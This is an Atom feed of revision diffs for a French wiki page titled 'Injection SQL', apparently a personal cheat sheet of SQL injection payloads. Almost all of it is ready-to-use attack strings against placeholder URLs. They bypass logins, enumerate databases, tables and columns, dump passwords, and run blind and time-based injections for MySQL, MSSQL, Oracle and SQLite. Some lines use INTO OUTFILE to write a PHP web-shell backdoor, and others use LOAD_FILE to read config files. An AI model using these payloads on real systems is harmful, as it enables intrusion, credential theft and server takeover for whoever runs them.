https://futex.re/mediawiki/index.php?action=history&feed=atom&title=1.1_Injection_SQL
1.1 Injection SQL - Historique des versions
2026-05-13T14:57:51Z
Historique des versions pour cette page sur le wiki
MediaWiki 1.39.17
https://futex.re/mediawiki/index.php?title=1.1_Injection_SQL&diff=2562&oldid=prev
Futex le 27 septembre 2016 à 20:49
2016-09-27T20:49:50Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="fr">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version du 27 septembre 2016 à 20:49</td>
</tr><tr>
<td colspan="2" class="diff-lineno">Ligne 29 :</td>
<td colspan="2" class="diff-lineno">Ligne 29 :</td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> </div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Lister les tables</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Lister les tables</div></td>
</tr>
<tr>
<td colspan="2" class="diff-lineno">Ligne 36 :</td>
<td colspan="2" class="diff-lineno">Ligne 37 :</td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0hulk’ union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()#</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Afficher les champs</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Afficher les champs</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/Fonctions/test.php?id=hulk’ union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name=”users”#</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Afficher les valeurs</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Afficher les valeurs</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> http://toto.com/ident.php?login=hulk’ union select 1,login,password,email,secret,6,7 from users#</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)</div></td>
</tr>
</table>
Futex
https://futex.re/mediawiki/index.php?title=1.1_Injection_SQL&diff=2546&oldid=prev
Futex : /* Blind SQLite injection */
2016-01-24T20:19:12Z
<p><span dir="auto"><span class="autocomment">Blind SQLite injection</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="fr">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version du 24 janvier 2016 à 20:19</td>
</tr><tr>
<td colspan="2" class="diff-lineno">Ligne 111 :</td>
<td colspan="2" class="diff-lineno">Ligne 111 :</td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Recherche de la longueur du pass:</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Recherche de la longueur du pass:</div></td>
</tr>
<tr>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> 'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --</div></td>
<td class="diff-marker"></td>
<td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> 'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>== Time based injection ==</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Mysql</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> admin' and sleep(30)#</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Microsoft SQL</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> admin' waitfor delay '00:00:10'--</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><br /></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Oracle</div></td>
</tr>
<tr>
<td colspan="2" class="diff-empty diff-side-deleted"></td>
<td class="diff-marker" data-marker="+"></td>
<td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> BEGIN DBMS_LOCK.SLEEP(15); END;</div></td>
</tr>
</table>
Futex
https://futex.re/mediawiki/index.php?title=1.1_Injection_SQL&diff=1989&oldid=prev
Futex le 16 janvier 2013 à 20:47
2013-01-16T20:47:56Z
<p></p>
<p><b>Nouvelle page</b></p><div>Injecter<br />
OR 'a'='a ou '1 or '1'='1<br />
<br />
Smitch' OR '1'='1 <br />
Smitch' OR 1=1 OR 'a'='a<br />
<br />
Pour que la requète SQL devienne<br />
SELECT login FROM users WHERE login='Smitch' OR 'a'='a' AND password='test123'OR 'a'='a'<br />
SELECT * FROM notice WHERE id='0' UNION SELECT NULL,NULL,NULL,User()''<br />
<br />
ou 'OR 1=1# en mot de passe, tous ce qui est derrière le # est ignoré.<br />
<br />
Avec un commentaire:<br />
http://toto.com/ident.php?login='/*&pass=*/or+'1'='1<br />
<br />
Recherche du nombre de champ dans la requête<br />
http://toto.com/ident.php?login='ORDER BY 3/*&pass=toto ou<br />
http://toto.com/test.php?id=1' UNION SELECT 1,2,3,'4<br />
Si la requête tombe en erreur c'est que l'on a dépassé le nombre de champ<br />
<br />
Recherche de l'ID<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT 1,2,3/*&pass=toto<br />
<br />
Affichage de la version de Mysql<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT @@version,2,3/*&pass=toto<br />
http://toto.com/test.php?id=0' UNION SELECT @@version,1,'2 <br />
<br />
Recherche des bases<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto<br />
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1<br />
<br />
Lister les tables<br />
-1 UNION SELECT null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database();--<br />
-1 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema=database()),null<br />
<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto<br />
http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1<br />
<br />
Afficher les champs<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto<br />
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users<br />
<br />
Afficher les valeurs<br />
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto<br />
<br />
Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)<br />
<br />
SELECT '<? system($cmd); ?>' FROM existant_table INTO DUMPFILE '/path/to/website/backdoor.php'<br />
SELECT * FROM notice WHERE id='0' UNION SELECT null, '<?php system(\$_GET[cmd]) ?>' INTO OUTFILE '/tmp/toto.php' <br />
<br />
Lire un fichier<br />
<br />
SELECT LOAD_FILE('/complete/path/file2.txt')<br />
<br />
Lire et copier un fichier<br />
<br />
SELECT LOAD_FILE('/complete/path/config.php') FROM existant_table INTO OUTFILE '/complete/path/config.txt'<br />
<br />
UNION<br />
http://toto.com/test.php?id=0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1 donne la requête<br />
SELECT * FROM notice WHERE id='0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1'<br />
<br />
Lors d'un UNION si les deux champs union ne sont pas du même type integer <- string les convertir grâce a: SELECT CONV(mpass,36,10)<br />
SELECT mid FROM membres WHERE mid=4 UNION SELECT CONV(mpass,36,10) FROM membres WHERE mid=5<br />
<br />
On peut concaténer 2 champs avec la fonction CONCAT(mlogin,char(58),char(58),memail)<br />
SELECT * FROM admin WHERE alogin='webmaster' UNION SELECT mid,CONCAT(mlogin,char(58),char(58),memail),mpass,mnewsletter FROM membres WHERE mlogin='Franck'<br />
<br />
Faire en sorte que la première requête ne renvoi rien (mid=-1 ou mid=5 OR 1=0 UNION SELECT apass FROM admin WHERE aid=1)<br />
SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1<br />
SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1 INTO OUTFILE '/path/apass.txt'<br />
<br />
<br />
<br />
----<br />
<br />
Recherche en aveugle<br />
<br />
Utiliser la fonction IF de mysql et la dichotomie<br />
IF(10, 0, 666) (Si c'est on renvoit 666, sinon 0)<br />
<br />
ex:<br />
http://toto.com/ident.php?login=' AND IF((SELECT COUNT(*) FROM information_schema.SCHEMATA)>100,0(SELECT table_name FROM information_schema.TABLES))/*&pass=ds<br />
<br />
== Blind MySQL injection ==<br />
<br />
Recherche de mot de passe caractère par caractère<br />
profile.php?user_id=1 AND substr(password,0,1)= 0×66<br />
<br />
<br />
== Injection sous SQLite ==<br />
<br />
Afficher la version de SQLite<br />
'UNION SELECT sqlite_version(),2<br />
Trouver les noms des bases de données<br />
'UNION SELECT name,2 FROM sqlite_master WHERE type = "table"--<br />
Renvoit: news,users<br />
<br />
Trouver le nom des champs:<br />
'UNION SELECT sql,2 FROM sqlite_master WHERE tbl_name = 'users' AND type = 'table'--<br />
<br />
Renvoit: CREATE TABLE users(username TEXT, password TEXT, Year INTEGER) (2)<br />
<br />
Afficher les champs :<br />
'UNION SELECT username,password FROM users--<br />
<br />
== Blind SQLite injection ==<br />
Recherche du premier caractère du login<br />
'UNION SELECT username,password FROM users WHERE substr(username,0,1)= 'a'--<br />
<br />
Recherche de la longueur du pass:<br />
'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --</div>
Futex